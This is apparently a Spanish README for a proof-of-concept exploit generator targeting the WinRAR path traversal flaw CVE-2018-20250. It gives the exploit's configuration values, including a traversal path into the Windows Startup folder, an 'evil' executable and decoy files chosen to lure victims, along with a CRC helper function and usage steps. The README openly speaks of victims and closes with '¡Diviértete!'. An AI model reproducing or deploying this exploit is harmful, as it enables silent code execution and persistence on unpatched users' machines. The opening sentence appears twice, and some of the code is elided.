
WinRar es un software muy conocido para Windows. La versión anterior de WinRaR tenía una vulnerabilidad que fue parcheada en febrero de 2019. La mayoría de las personas no actualizaron WinRAR, por lo que son vulnerables a este bug de Absolute Path Traversal [CVE-2018-20250]
WinRar es un software muy conocido para Windows. Una versión anterior de WinRaR tenía una vulnerabilidad que fue parcheada en febrero de 2019. La mayoría de las personas no actualizaron WinRAR, por lo que son vulnerables a este bug de recorrido de ruta absoluta [CVE-2018-20250]
exp para Extraer ejecución de código desde WinRAR
poc por Ridter
¿Cómo usar?
solo necesitas instalar Python 3.7, preparar un archivo malicioso que quieras ejecutar, definir los valores que quieras, ¡este script exp generará el archivo comprimido malicioso automáticamente!
... ...
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# This command may be different, it depends on the your Python3 environment.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
ejecuta el exp, el exp generará el test.rar automáticamente
si la víctima abre el test.rar, verá los archivos hello.txt y world.txt; también puedes añadir más archivos, más atractivos.
![]()
hi.exe; en realidad es un calc.exe. cuando reinicie el equipo, el hi.exe se ejecutará.![]()
¡Diviértete! :)